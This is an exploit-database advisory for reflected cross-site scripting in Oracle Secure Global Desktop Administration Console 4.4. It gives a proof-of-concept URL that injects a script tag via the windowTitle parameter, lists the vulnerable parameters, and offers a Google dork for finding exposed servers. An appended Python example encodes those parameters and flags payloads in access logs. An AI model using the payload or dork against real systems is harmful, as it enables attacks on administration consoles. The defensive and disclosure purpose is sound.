Oracle Secure Global Desktop Administration Console 4.4 Cross Site Scripting Vulnerability

1337DAY-ID-31677
Rafael Pedrero
0day.today
Nov 26, 2018

EPSS: 0.003 (percentile 67.9%)

Oracle Secure Global Desktop Administration Console version 4.4 build 20080807152602 suffers from cross site scripting vulnerabilities.

<!--
# Exploit Title: Cross Site Scripting in Oracle Secure Global Desktop Administration Console - 4.4; Build: 20080807152602
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.oracle.com/
# Software Link: http://www.oracle.com/
# Version: Oracle Secure Global Desktop Administration Console - 4.4; Build: 20080807152602
# Tested on: all
# CVE : CVE-2018-19439
# Category: webapps

1. Description

Cross Site Scripting exists in the Administration Console in Oracle Secure
Global Desktop 4.4 20080807152602. The page "helpwindow.jsp" has reflected
XSS via all parameters.


2. Proof of Concept

http://X.X.X.X/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelp Window></TITLE></HEAD><body><script>alert("XSS")</script><!--&helpFile=concepts.html&pageTitle=Administrator Help&mastheadUrl=/images/productNameSecondaryMasthead.png&mastheadDescription=Sun Secure Global Desktop Administration&jspPath=/sgdadmin/faces/com_sun_web_ui/help/&mastheadHeight=40&mastheadWidth=20

Vulnerable parameters:
windowTitle, helpFile, pageTitle, mastheadUrl, mastheadDescription,
jspPath, mastheadHeight and mastheadWidth.

Google dorks:
inurl:"/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"


3. Solution:

Update to the latest version, Oracle Secure Global Desktop Administration
Console 5.4.

-->
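As an added defensive example (not part of the advisory and not Oracle's product code): a Python stand-in for a help-window page that encodes each of the eight parameters listed above for the HTML context it is written into, so the title payload from the proof of concept is rendered as inert text, plus a scanner that flags access-log requests to helpwindow.jsp carrying markup in any of those parameters. The page layout, the relative-path allow-list, the numeric defaults and the log lines are constructed assumptions of this example.

```python
"""Context-aware encoding and log detection for the reflected XSS class above.

Added example; the page markup, allow-list and log lines are constructed.
"""
import re
from html import escape
from urllib.parse import parse_qs, urlsplit

# Parameter names taken from the advisory's "Vulnerable parameters" list.
REFLECTED_PARAMS = (
    "windowTitle", "helpFile", "pageTitle", "mastheadUrl",
    "mastheadDescription", "jspPath", "mastheadHeight", "mastheadWidth",
)


def _int_or_default(value, default):
    """Numeric attributes: accept digits only, never reflect the raw string."""
    return int(value) if value is not None and value.isdigit() else default


def _safe_path(value, default):
    """URL-type attributes: allow a conservative relative-path charset
    (an assumption of this example) and reject traversal; otherwise fall
    back to a fixed default instead of reflecting the input."""
    if value and re.fullmatch(r"[A-Za-z0-9_./-]+", value) and ".." not in value:
        return escape(value, quote=True)
    return default


def render_help_window(params):
    """Return the page HTML with every reflected value encoded for its context.

    Text and attribute values go through html.escape with quote=True, so
    '<', '>', '"' and "'" can no longer close the <title> or an attribute.
    """
    title = escape(params.get("windowTitle", "Help"), quote=True)
    page_title = escape(params.get("pageTitle", ""), quote=True)
    description = escape(params.get("mastheadDescription", ""), quote=True)
    masthead = _safe_path(params.get("mastheadUrl"), "/images/masthead.png")
    help_file = _safe_path(params.get("helpFile"), "index.html")
    jsp_path = _safe_path(params.get("jspPath"), "/help/")
    height = _int_or_default(params.get("mastheadHeight"), 40)
    width = _int_or_default(params.get("mastheadWidth"), 20)
    return (
        f"<html><head><title>{title}</title></head><body>"
        f'<img src="{masthead}" alt="{description}" height="{height}" width="{width}">'
        f"<h1>{page_title}</h1>"
        f'<iframe src="{jsp_path}{help_file}"></iframe>'
        "</body></html>"
    )


# Characters or tokens that have no business in these parameters.
MARKUP = re.compile(r"[<>\"']|javascript:|on\w+=", re.IGNORECASE)
LOG_LINE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def flag_suspicious_requests(log_lines):
    """Return (client_ip, [parameter names]) for each helpwindow.jsp request
    whose percent-decoded query carries markup in a reflected parameter."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/help/helpwindow.jsp"):
            continue
        qs = parse_qs(url.query, keep_blank_values=True)  # decodes %xx and '+'
        bad = [p for p in REFLECTED_PARAMS
               if any(MARKUP.search(v) for v in qs.get(p, []))]
        if bad:
            hits.append((ip, bad))
    return hits


# Constructed access-log lines: one benign request, one carrying a title
# payload of the kind shown in the proof of concept, one unrelated page.
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Nov/2018:10:00:00 +0000] "GET /sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?windowTitle=Administrator+Help&helpFile=concepts.html&mastheadHeight=40 HTTP/1.1" 200 1234',
    '10.0.0.9 - - [26/Nov/2018:10:00:05 +0000] "GET /sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?windowTitle=Help%3C%2Ftitle%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&mastheadHeight=40 HTTP/1.1" 200 1234',
    '10.0.0.9 - - [26/Nov/2018:10:00:07 +0000] "GET /sgdadmin/faces/login.jsp?user=%3Cb%3E HTTP/1.1" 200 555',
]

if __name__ == "__main__":
    payload = {"windowTitle": '</TITLE></HEAD><body><script>alert("XSS")</script>'}
    print(render_help_window(payload))
    print(flag_suspicious_requests(SAMPLE_LOG))
```

The renderer treats the two numeric and three path-like parameters as typed values rather than free text, which is the usual way to keep output encoding from being the only line of defence; the scanner only looks at the eight named parameters, so it does not fire on markup in unrelated pages.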

#  0day.today [2019-01-21]  #
